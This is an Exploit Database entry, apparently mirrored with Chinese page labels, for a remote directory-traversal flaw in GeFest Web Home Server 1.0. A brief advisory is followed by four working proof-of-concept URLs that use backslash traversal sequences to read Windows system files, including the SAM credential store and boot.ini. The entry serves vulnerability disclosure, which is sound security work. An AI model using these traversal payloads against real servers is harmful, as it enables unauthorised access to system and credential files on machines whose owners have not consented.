GeFest Web Home Server 1.0 – Directory Traversal

• Exploit Database
• 11 阅读

• 作者： Markot
  日期： 2010-02-08
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/33611/

• source: https://www.securityfocus.com/bid/38141/info
  
  Gefest Web Home Server is prone to a remote directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
  
  Exploiting this issue will allow an attacker to view arbitrary local files within the context of the webserver. Information harvested may aid in launching further attacks.
  
  Gefest Web Home Server 1.0 is vulnerable; other versions may also be affected. 
  
  http://www.example.com/\../\../\../WINDOWS\SYSTEM32\calc.exe
  http://www.example.com/\../\../\../WINDOWS\SYSTEM32\config\sam
  http://www.example.com/\../\../\../WINDOWS\SYSTEM32
  http://www.example.com/\../\../\../boot.ini